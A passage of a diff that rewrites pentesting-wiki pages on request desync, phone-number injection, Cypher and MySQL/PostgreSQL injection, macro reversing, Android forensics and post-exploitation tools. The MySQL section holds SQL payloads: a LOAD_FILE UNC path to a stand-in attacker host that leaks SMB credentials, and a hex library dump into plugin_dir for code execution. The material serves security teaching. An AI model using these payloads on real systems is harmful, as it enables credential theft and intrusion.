-- Only use headers and syntax that a browser can emit via navigation, fetch, or form submission. Header obfuscations (LWS tricks, duplicate TE, invalid CL) generally won’t send.
-- Target endpoints and intermediaries that reflect inputs or cache responses. Useful impacts include cache poisoning, leaking front-end injected headers, or bypassing front-end path/method controls.
-- Reuse matters: align the crafted request so it shares the same HTTP/1.1 or H2 connection as a high-value victim request. Connection-locked/stateful behaviors amplify impact.
-- Prefer primitives that do not require custom headers: path confusion, query-string injection, and body shaping via form-encoded POSTs.
-- Validate genuine server-side desync vs. mere pipelining artifacts by re-testing without reuse, or by using the HTTP/2 nested-response check.<sup>[[3]](#references)</sup>
+## Testing considerations
 
-For end-to-end techniques and PoCs see:
-- PortSwigger Research – Browser‑Powered Desync Attacks: https://portswigger.net/research/browser-powered-desync-attacks<sup>[[1]](#references)</sup>
-- PortSwigger Academy – client‑side desync: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync<sup>[[2]](#references)</sup>
+- Use only headers and syntax that a browser can emit through navigation, Fetch, or form submission. Techniques that require forbidden or malformed headers generally cannot be reproduced in a browser.
+- Look for endpoints and intermediaries that reflect input, cache responses, or reuse connections. Potential impact includes cache poisoning, disclosure of front-end-injected headers, and bypasses of front-end path or method controls.
+- Connection reuse is essential: the crafted request must share a persistent connection with a later request for the desynchronization to affect it.
+- Prefer primitives that do not require custom headers, such as path confusion, query-string injection, and body shaping through form-encoded POST requests.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
+- Distinguish a real server-side desynchronization from HTTP pipelining artifacts. Repeat the test without connection reuse and, where applicable, use the HTTP/2 nested-response technique.<sup>[[3]](#references)</sup>
 
 ## References
 
-- [1] [PortSwigger Research - Browser‑Powered Desync Attacks](https://portswigger.net/research/browser-powered-desync-attacks)
-- [2] [PortSwigger Academy - Client‑Side Desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync)
-- [3] [PortSwigger Research - Beware the false false‑positive: how to distinguish HTTP pipelining from request smuggling](https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling)
+- [1] [PortSwigger Research - Browser-Powered Desync Attacks](https://portswigger.net/research/browser-powered-desync-attacks)
+- [2] [PortSwigger Web Security Academy - Client-side desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync)
+- [3] [PortSwigger Research - How to distinguish HTTP pipelining from request smuggling](https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/phone-number-injections.md
+++ b/src/pentesting-web/phone-number-injections.md
@@ -2,18 +2,21 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:<sup>[[1]](#references)</sup>
+Applications often treat a phone number as a simple string even though a `tel` URI may contain semicolon-delimited parameters such as `ext`, `isub`, and `phone-context`.<sup>[[1]](#references)</sup> If an application accepts these suffixes but different components validate, store, render, or forward them inconsistently, the suffix may reach an injection sink or bypass controls based on exact string comparison. Test for XSS, SQL injection, SSRF, parser discrepancies, and downstream telephony issues only where the application's data flow makes the corresponding sink plausible.<sup>[[2]](#references)</sup>
 
-<figure><img src="../images/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+<figure><img src="../images/image (461).png" alt="Structure of a telephone URI with a global or local number and optional parameters"><figcaption>Telephone URI structure and common optional parameters.</figcaption></figure>
 
-<figure><img src="../images/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+<figure><img src="../images/image (941).png" alt="Examples of malicious phone-number parameters targeting XSS, SSRF, OTP rate limits, and telephony parsers"><figcaption>Potential issues caused by inconsistent handling of phone-number parameters.</figcaption></figure>
 
-**OTP Bypass / Bruteforce** would work like this:<sup>[[1]](#references)</sup>
+## OTP Rate-Limit Bypass
 
-<figure><img src="../images/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+If a rate limiter keys attempts by the exact submitted string but the delivery provider normalizes multiple parameterized values to the same destination, an attacker may rotate suffixes to obtain separate attempt counters for one account. The figure illustrates the concept with changing `ext` values; successful exploitation depends on the application's and provider's normalization behavior.<sup>[[2]](#references)</sup>
+
+<figure><img src="../images/image (116).png" alt="OTP spraying example that rotates telephone URI extension values to obtain separate rate-limit counters"><figcaption>Conceptual OTP spraying through inconsistent phone-number normalization.</figcaption></figure>
 
 ## References
 
-- [1] [#NahamCon2022EU: RTFR (Read The Bleeping RFC) - securinti](https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0)
+- [1] [RFC 3966 - The `tel` URI for Telephone Numbers](https://www.rfc-editor.org/rfc/rfc3966.html)
+- [2] [NahamCon EU 2022 - RTFR (Read The Bleeping RFC), securinti](https://www.youtube.com/watch?v=4ZsTKvfP1g0)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
+++ b/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
@@ -1,11 +1,10 @@
-# Cypher Injection (neo4j)
+# Cypher Injection (Neo4j)
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Check the following blogs:<sup>[[1]](#references)[[2]](#references)</sup>
+Cypher injection occurs when an application constructs a Neo4j Cypher query by concatenating untrusted input. An attacker may alter the query structure to read or modify graph data and, depending on enabled procedures and cloud integrations, reach additional secrets or services.<sup>[[1]](#references)[[2]](#references)</sup>
 
-- [https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits](https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits)<sup>[[1]](#references)</sup>
-- [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)<sup>[[2]](#references)</sup>
+Use parameterized queries for values and allowlist any identifiers or query fragments that cannot be parameterized. The references below contain practical discovery and exploitation examples.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## References
 
@@ -13,6 +12,3 @@ Check the following blogs:<sup>[[1]](#references)[[2]](#references)</sup>
 - [2] [The Most Underrated Injection of All Time — Cypher Injection](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -2,32 +2,51 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This is a summary of the MySQL/MariaDB/Percona techniques from [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.<sup>[[1]](#references)</sup>
+This page summarizes MySQL-family techniques described in the original SSRF/XSPA research and adds the relevant MySQL security constraints.<sup>[[1]](#references)</sup>
 
-### Server-Side Request Forgery (SSRF) via SQL Functions
+## UNC-path requests through `LOAD_FILE()`
 
-In the exploration of SQL Out of Band data exfiltration, the `LOAD_FILE()` function is commonly employed to initiate network requests. This function, however, is constrained by the operating system it operates on and the database's startup configurations.
+`LOAD_FILE()` reads a file from the database server's host. It requires the MySQL `FILE` privilege, an absolute path, operating-system access for the `mysqld` account, and a path allowed by `secure_file_priv`.<sup>[[2]](#references)</sup>
 
-The `secure_file_priv` global variable, if unset, defaults to `/var/lib/mysql-files/`, limiting file access to this directory unless set to an empty string (`""`). This adjustment necessitates modifications in the database's configuration file or startup parameters.
+`secure_file_priv` is platform- and build-dependent: a directory confines file operations to that directory, an empty value imposes no path restriction, and `NULL` disables the relevant import/export operations. Do not assume `/var/lib/mysql-files/` is universal; query the live value:<sup>[[2]](#references)</sup>
 
-Given `secure_file_priv` is disabled (`""`), and assuming the necessary file and `file_priv` permissions are granted, files outside the designated directory can be read. Yet, the capability for these functions to make network calls is highly dependent on the operating system. On Windows systems, network calls to UNC paths are feasible due to the operating system's understanding of UNC naming conventions, potentially leading to the exfiltration of NTLMv2 hashes.
+```sql
+SELECT @@global.secure_file_priv;
+SELECT LOAD_FILE('C:\\Windows\\win.ini');
+```
 
-This SSRF method is limited to TCP port 445 and does not permit port number modification, though it can be used to access shares with full read privileges and, as demonstrated in prior research, to steal hashes for further exploitation.
+On Windows, a UNC path can make the host attempt SMB authentication to a remote server. This is better described as an outbound SMB/credential-leak primitive than general-purpose SSRF: the destination port is not freely selectable, and the request is not arbitrary HTTP.<sup>[[1]](#references)</sup>
 
-### Remote Code Execution (RCE) via User Defined Functions (UDF)
+```sql
+SELECT LOAD_FILE('\\\\attacker.example\\share\\file');
+```
 
-MySQL databases offer the use of User Defined Functions (UDF) from external library files. If these libraries are accessible within specific directories or the system's `$PATH`, they can be invoked from within MySQL.
+## Loadable-function path to code execution
 
-This technique allows for the execution of network/HTTP requests through a UDF, provided several conditions are met, including write access to the `@@plugin_dir`, `file_priv` set to `Y`, and `secure_file_priv` disabled.
+MySQL loadable functions (historically called UDFs) execute native code from a shared library. A library registered with `CREATE FUNCTION ... SONAME` must reside in the directory identified by `plugin_dir` on supported MySQL versions.<sup>[[3]](#references)</sup>
 
-For instance, the `lib_mysqludf_sys` library or other UDF libraries enabling HTTP requests can be loaded to perform SSRF. The libraries must be transferred to the server, which can be achieved through hex or base64 encoding of the library's contents and then writing it to the appropriate directory.
+An SQL-injection path becomes code execution only if several independent conditions hold: the database account can write a compatible shared library, file writes can reach `@@plugin_dir`, the account can register the function, and the operating system permits `mysqld` to load it. MySQL explicitly warns that a writable plugin directory combined with the `FILE` privilege may allow executable code to be installed.<sup>[[4]](#references)</sup>
 
-The process varies if the `@@plugin_dir` is not writable, especially for MySQL versions above `v5.0.67`. In such cases, alternative paths that are writable must be used.
+Where those prerequisites hold, the library bytes can be represented as a hexadecimal SQL literal and written without formatting by using `SELECT ... INTO DUMPFILE`. The destination must satisfy `secure_file_priv`, must not already exist, and is created under the operating-system account that runs `mysqld`.<sup>[[5]](#references)</sup>
 
-Automation of these processes can be facilitated by tools such as SQLMap, which supports UDF injection, and for blind SQL injections, output redirection or DNS request smuggling techniques may be utilized.
+```sql
+SELECT 0x<hex-encoded-library> INTO DUMPFILE '<plugin_dir>/library_name.so';
+```
+
+```sql
+SELECT @@plugin_dir, @@global.secure_file_priv;
+SHOW GRANTS;
+```
+
+SQLMap supports custom UDF injection through `--udf-inject` and `--shared-lib`, but its result still depends on these database, filesystem, architecture, and operating-system prerequisites.<sup>[[6]](#references)</sup>
 
 ## References
 
 - [1] [Using SQL Injection to perform SSRF/XSPA attacks](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)
+- [2] [MySQL 8.0 Reference Manual - `secure_file_priv`](https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html#sysvar_secure_file_priv)
+- [3] [MySQL 8.4 Reference Manual - `CREATE FUNCTION` Statement for Loadable Functions](https://dev.mysql.com/doc/refman/8.4/en/create-function-loadable.html)
+- [4] [MySQL Reference Manual - Making MySQL Secure Against Attackers](https://dev.mysql.com/doc/refman/8.4/en/security-against-attack.html)
+- [5] [MySQL 8.0 Reference Manual - `SELECT ... INTO DUMPFILE`](https://dev.mysql.com/doc/refman/8.0/en/select-into.html)
+- [6] [sqlmap usage - User-defined function injection](https://github.com/sqlmapproject/sqlmap/wiki/usage#inject-custom-user-defined-functions-udf)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
@@ -1,10 +1,10 @@
-# dblink/lo_import data exfiltration
+# PostgreSQL `dblink` and `lo_import` Data Exfiltration
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This is an example of how to exfiltrate data loading files in the database with `lo_import` and exfiltrate them using `dblink_connect`.**<sup>[[1]](#references)</sup>
+In the documented challenge, PostgreSQL's `lo_import` function loads a server-side file as a large object and returns its object identifier (OID). When direct access to the imported object's contents is unavailable, the OID is embedded in a `dblink_connect` connection string and sent to an attacker-controlled PostgreSQL endpoint as an out-of-band exfiltration channel. This technique requires the relevant function privileges, the `dblink` extension, and outbound network access from the database server.<sup>[[1]](#references)</sup>
 
-**Check the solution from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)<sup>[[1]](#references)</sup>
+The complete challenge solution also explains how to validate each prerequisite and capture the resulting connection.<sup>[[1]](#references)</sup>
 
 ## References
 

--- a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
+++ b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
@@ -1,30 +1,31 @@
-# Debugging Client Side JS
+# Debugging Client-Side JavaScript
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Debugging client side JS can be a pain because every-time you change the URL (including a change in the params used or param values) you need to **reset the breakpoint and reload the page**.
+Client-side JavaScript debugging can become repetitive when navigation or parameter changes reload the page and invalidate temporary debugging state.
 
-### `debugger;`
+## `debugger;`
 
-If you place the line `debugger;` inside a JS file, when the **browser** executes the JS it will **stop** the **debugger** in that place. Therefore, one way to set constant breakpoints would be to **download all the files locally and change set breakpoints in the JS code**.<sup>[[1]](#references)</sup>
+When developer tools are open, a `debugger;` statement pauses execution at that point unless breakpoints are disabled. Adding the statement to a persistent local copy is one way to keep the pause point across reloads.<sup>[[1]](#references)</sup>
 
-### Overrides
+## Overrides
 
-Browser overrides allows to have a local copy of the code that is going to be executed and execute that one instead of the one from the remote server.<sup>[[1]](#references)</sup>\
-You can **access the overrides** in "Dev Tools" --> "Sources" --> "Overrides".
+Chrome DevTools Local Overrides stores a local replacement for a network resource and serves that replacement on subsequent page loads.<sup>[[2]](#references)</sup>
 
-You need to **create a local empty folder to be used to store the overrides**, so just create a new local folder and set is as override in that page.
+1. Open **DevTools > Sources > Overrides**.
+2. Select an empty local folder and allow DevTools to access it.
+3. In the **Page** tree, right-click the target script and select **Override content** or **Save for overrides**, depending on the Chrome version.
+4. Add `debugger;`, save the file, and reload the page.
 
-Then, in "Dev Tools" --> "Sources" **select the file** you want to override and with **right click select "Save for overrides"**.
+![Selecting a JavaScript file in the Sources panel and saving it as a local override](<../../images/image (742).png>)
 
-![debugger; - Overrides: Then, in "Dev Tools" -- "Sources" select the file you want to override and with right click select "Save for overrides"](<../../images/image (742).png>)
+The saved local copy now replaces the matching network resource while overrides are enabled. Changes therefore persist across reloads, but they affect only your local browser profile.<sup>[[2]](#references)</sup>
 
-This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:<sup>[[1]](#references)</sup>
-
-![debugger; - Overrides: This will copy the JS file locally and you will be able to modify that copy in the browser . So just add the debugger; command wherever you want, save the change...](<../../images/image (594).png>)
+![A locally overridden JavaScript file containing a debugger statement](<../../images/image (594).png>)
 
 ## References
 
-- [1] [4 hackers, one XSS challenge! Solution to April '22 XSS Challenge](https://www.youtube.com/watch?v=BW_-RCo9lo8&t=1529s)
+- [1] [Chrome for Developers - JavaScript debugging reference](https://developer.chrome.com/docs/devtools/javascript/reference)
+- [2] [Chrome for Developers - Override web content and HTTP response headers locally](https://developer.chrome.com/docs/devtools/overrides/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
+++ b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
@@ -2,13 +2,13 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Leak script content by converting it to UTF16
+## Leak Script Content by Interpreting It as UTF-16
 
-[**This writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) leaks a text/plain because there is no `X-Content-Type-Options: nosniff` header by adding some initial characters that will make javascript think that the content is in UTF-16 so th script doesn't breaks.<sup>[[1]](#references)</sup>
+If a `text/plain` response lacks the `X-Content-Type-Options: nosniff` header, a browser may accept it as a script. In the cited challenge, an attacker-controlled prefix supplies a UTF-16 byte-order mark and valid JavaScript bytes. The remaining secret is then decoded as valid identifier characters, allowing the script to expose it through a property of `window`.<sup>[[1]](#references)</sup>
 
-## Leak script content by treating it as an ICO
+## Leak Content by Treating It as an ICO Image
 
-[**The next writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves) leaks the script content by loading it as if it was an ICO image accessing the `width` parameter.<sup>[[2]](#references)</sup>
+In a related challenge, a crafted prefix makes the response parse as an ICO image and positions one secret byte in the image-width field. Loading successive variants as cross-origin images and reading their `width` reveals the secret one byte at a time.<sup>[[2]](#references)</sup>
 
 ## References
 

--- a/src/reversing/word-macros.md
+++ b/src/reversing/word-macros.md
@@ -2,17 +2,20 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-### Junk Code
+## Junk Code
 
-It's very common to find **junk code that is never used** to make the reversing of the macro more difficult.\
-For example, in the following image you can see that and If that is never going to be true is used to execute some junk and useless code.
+Macros may contain **unreachable or irrelevant code** intended to slow analysis. Identify constant conditions and trace reachable behavior before spending time reversing a branch. The example below uses an `If` condition that can never be true to conceal junk code.
 
-![Word Macros - Junk Code: For example, in the following image you can see that and If that is never going to be true is used to execute some junk and useless code](<../images/image (369).png>)
+![A Word macro containing an unreachable conditional branch with junk code](<../images/image (369).png>)
 
-### Macro Forms
+## Macro Forms
 
-Using the **GetObject** function it's possible to obtain data from forms of the macro. This can be used to difficult the analysis. The following is a photo of a macro form used to **hide data inside text boxes** (a text box can be hiding other text boxes):
+VBA UserForms can store data in controls such as text boxes. Because forms, frames, and pages can each expose a `Controls` collection, analysts should enumerate the entire control hierarchy rather than relying only on what the form displays. The example below stores concealed data in overlapping text boxes.<sup>[[1]](#references)</sup>
 
-![Junk Code - Macro Forms: Using the GetObject function it's possible to obtain data from forms of the macro. This can be used to difficult the analysis. The following is a photo of a...](<../images/image (344).png>)
+![A macro UserForm with data concealed in overlapping text boxes](<../images/image (344).png>)
+
+## References
+
+- [1] [Microsoft Learn - Collections, controls, and objects (Microsoft Forms)](https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/objects-microsoft-forms)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/todo/android-forensics.md
+++ b/src/todo/android-forensics.md
@@ -4,29 +4,46 @@
 
 ## Locked Device
 
-To start extracting data from an Android device it has to be unlocked. If it's locked you can:
+Prefer acquisition methods that preserve the device's state and document every action. If the device is locked, available options depend on the model, Android version, patch level, and whether access was configured before seizure. NIST recommends choosing a method according to the device and the authority for the examination.<sup>[[1]](#references)</sup>
 
-- Check if the device has debugging via USB activated.
-- Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)<sup>[[1]](#references)</sup>
-- Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)<sup>[[2]](#references)</sup>
+- Check whether USB debugging was enabled and whether the acquisition workstation is already authorized. ADB access normally requires the user to unlock the device and confirm the workstation's RSA key.<sup>[[3]](#references)</sup>
+- Consider whether biometric access remains available under the applicable legal and procedural rules.
+- A **smudge attack** may reveal a graphical unlock pattern from residue on the screen, although later touches and cleaning reduce its reliability.<sup>[[2]](#references)</sup>
+- Use commercial or research lock-bypass tooling only when it explicitly supports the exact device and software build.
 
-## Data Adquisition
+## Data acquisition
 
-Create an [android backup using adb](../mobile-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
+On older devices, a legacy [ADB backup](../mobile-pentesting/android-app-pentesting/adb-commands.md#backup) may produce a `.backup` file that Android Backup Extractor can unpack:<sup>[[6]](#references)</sup>
 
-### If root access or physical connection to JTAG interface
+```bash
+java -jar abe.jar unpack file.backup file.tar
+```
 
-- `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
-- `df /data` (Discover the block size of the system).
-- dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size).
+Do not assume this captures every application. ADB labels the command deprecated, and Android 12 excludes data from apps targeting API level 31 or later unless the app is debuggable.<sup>[[4]](#references)</sup>
+
+### Root or physical debug access
+
+With root access on a live device, first inventory the partitions and mounts; the commands below do not apply directly to a physical JTAG acquisition. The correct block device is hardware-dependent, so do not assume it is always `mmcblk0`. Image only the verified source to separate storage:<sup>[[1]](#references)</sup>
+
+```bash
+cat /proc/partitions
+df /data
+dd if=/dev/block/<verified-device> of=/sdcard/device.img bs=4096
+```
+
+Hash the result and record the exact command, device identifiers, time, and any changes made during acquisition.<sup>[[1]](#references)</sup>
 
 ### Memory
 
-Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb.
+LiME can acquire physical memory from Linux and some Android devices, but its kernel module must be built for the target kernel and loaded with sufficient privileges. Module signing, kernel lockdown, and modern Android hardening may prevent it from loading.<sup>[[5]](#references)</sup>
 
 ## References
 
-- [1] [Smudge Attacks on Smartphone Touch Screens](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
-- [2] [This brute force device can crack any iPhone's PIN code](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
+- [1] [NIST SP 800-101 Rev. 1 - Guidelines on Mobile Device Forensics](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-101r1.pdf)
+- [2] [USENIX WOOT 2010 - Smudge Attacks on Smartphone Touch Screens](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
+- [3] [Android Developers - Android Debug Bridge](https://developer.android.com/tools/adb)
+- [4] [Android Developers - Android 12 ADB backup restriction](https://developer.android.com/about/versions/12/behavior-changes-12#adb-backup-restrictions)
+- [5] [504ensicsLabs - Linux Memory Extractor (LiME)](https://github.com/504ensicsLabs/LiME)
+- [6] [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/todo/burp-suite.md
+++ b/src/todo/burp-suite.md
@@ -2,20 +2,25 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Payloads
+## Intruder payload types
 
-- **Simple List:** Just a list containing an entry in each line
-- **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
-- **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
-- **Numbers:** Generate numbers from X to Y using Z step or randomly.
-- **Brute Forcer:** Character set, min & max length.
+- **Simple list:** Use a configured list of strings as payloads.
+- **Runtime file:** Read one payload per line at runtime. This is useful for large lists because Burp does not load the entire file into memory.
+- **Case modification:** Change the capitalization of an input string, for example to lowercase, uppercase, sentence case, or title case.
+- **Numbers:** Generate sequential or random numbers within a configured range.
+- **Brute forcer:** Generate every permutation for a chosen character set and minimum/maximum length.<sup>[[1]](#references)</sup>
 
-[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
+## Extensions and companion tools
 
-{{#ref}}
-https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e
-{{#endref}}
+- **Collabfiltrator** generates payloads that execute commands and exfiltrate their output through DNS queries to Burp Collaborator.<sup>[[2]](#references)</sup>
+- **Burp Suite Exporter** exports Burp findings for use in other reporting workflows.<sup>[[3]](#references)</sup>
+- **HTTP Script Generator** converts HTTP requests into scripts in several languages.<sup>[[4]](#references)</sup>
 
-[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
+## References
+
+- [1] [PortSwigger documentation - Burp Intruder payload types](https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/payload-types)
+- [2] [GitHub - 0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator)
+- [3] [ArtsSEC - Burp Suite Exporter](https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e)
+- [4] [GitHub - h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/todo/hardware-hacking/fault_injection_attacks.md
+++ b/src/todo/hardware-hacking/fault_injection_attacks.md
@@ -1,9 +1,14 @@
-# Fault Injection Attacks 
+# Fault Injection Attacks
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits.
+Fault injection deliberately disturbs a device while it is operating so that it performs an incorrect computation. A useful fault may skip an instruction, corrupt data, bypass a security check, or produce faulty cryptographic output from which secret information can be derived.<sup>[[1]](#references)</sup>
 
-There are a lot of methods and mediums for injecting fault into an electronic circuit.
+Common techniques manipulate the supply voltage or clock, inject electromagnetic interference, or use optical or laser stimulation.<sup>[[1]](#references)</sup> Their precision and invasiveness differ, but successful testing generally requires a repeatable trigger and systematic sweeps over timing, pulse width, and intensity. Begin with a stable baseline, record resets and malformed outputs separately, and change one parameter at a time.<sup>[[2]](#references)</sup>
+
+## References
+
+- [1] [Hayashi et al. - Non-invasive Trigger-free Fault Injection Method Based on Intentional Electromagnetic Interference](https://csrc.nist.gov/csrc/media/events/non-invasive-attack-testing-workshop/documents/04_hayashi.pdf)
+- [2] [ChipWhisperer Documentation - Capture Hardware Overview and Comparison](https://chipwhisperer.readthedocs.io/en/latest/Capture/overview.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/todo/industrial-control-systems-hacking/README.md
+++ b/src/todo/industrial-control-systems-hacking/README.md
@@ -1,19 +1,23 @@
-# Industrial Control Systems Hacking 
+# Industrial Control Systems Hacking
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## About this Section
+## About This Section
 
-This section contains all about Industrial Control Systems including concepts as well as methodologies to hack them with various security issues that persists in them. 
+This section introduces industrial control system (ICS) components, architectures, protocols, and security-assessment methods. ICS is part of the broader operational technology (OT) domain: programmable systems and devices that monitor or cause changes in physical processes. Common examples include supervisory control and data acquisition (SCADA) systems, distributed control systems (DCSs), and programmable logic controllers (PLCs).<sup>[[1]](#references)</sup>
 
-Industrial Control Systems are everywhere, since industries are vital for economic development of a nation. But these ICS are hard to update and lesser advancements are made in this field. Hence, finding security flaws is common here. Most of the protocols and standards used here where developed back in the 90's and have much lesser capabilities as compared to current attack scenarios. 
+Security work in these environments must account for requirements that differ from conventional IT, including process safety, reliability, availability, deterministic operation, and equipment lifecycles. A technically valid security control may still be unsuitable if it disrupts the physical process, so testing and remediation should be coordinated with the system owner and operations personnel.<sup>[[1]](#references)</sup>
 
-It has become important to secure these systems since damaging them can cost a lot and even lives at the worst case. To understand Industrial Contol Systems security, knowing the internals of them is necessary. 
+## Assessment Priorities
 
-Since Industrial Control Systems are installed following set standards, knowing each components would help in interconnecting every other mechanisms in the control system. Installation of these devices like PLCs and SCADA systems is different is various industries, hence information gathering is critical. 
+Begin by understanding the controlled process, system boundaries, network topology, assets, data flows, trust relationships, and external connections. Similar device types can serve different functions across sites, so avoid assuming that one deployment's architecture or impact model applies to another.<sup>[[1]](#references)</sup>
 
-Industrial Control Systems can be complicated at times and hence require a lot of patience to do anything. It's all about probing and reconnaissance before planning attacks and developing any exploits. 
+Prefer passive discovery and existing engineering documentation where possible. Any active scanning or exploitation should follow an approved test plan that defines safety constraints, maintenance windows, recovery procedures, and stop conditions. Findings should be evaluated for both cybersecurity impact and potential effects on the physical process.<sup>[[1]](#references)</sup>
 
-These techniques can also be used to protect against attacks and blue teaming for industrial control systems.
+The same architectural knowledge supports defensive activities such as asset inventory, network segmentation, monitoring, incident response, and risk-based vulnerability management.<sup>[[1]](#references)</sup>
+
+## References
+
+- [1] [NIST SP 800-82 Rev. 3 - Guide to Operational Technology (OT) Security](https://csrc.nist.gov/pubs/sp/800/82/r3/final)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/todo/post-exploitation.md
+++ b/src/todo/post-exploitation.md
@@ -1,18 +1,30 @@
-# Post Exploitation
+# Post-Exploitation
 
 {{#include ../banners/hacktricks-training.md}}
 
-## **Local l00t**
+Use these tools only in environments where you have explicit authorization.
 
-- [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): These scripts, apart for looking for PE vectors, will look for sensitive information inside the filesystem.
-- [**LaZagne**](https://github.com/AlessandroZ/LaZagne): The **LaZagne project** is an open source application used to **retrieve lots of passwords** stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
+## Local Collection
 
-## **External Services**
+- **PEASS-ng** enumerates potential local privilege-escalation paths on Windows, Linux/Unix, and macOS systems.<sup>[[1]](#references)</sup>
+- **LaZagne** retrieves credentials stored by supported applications through mechanisms such as plaintext files, operating-system APIs, custom algorithms, and databases.<sup>[[2]](#references)</sup>
 
-- [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to.
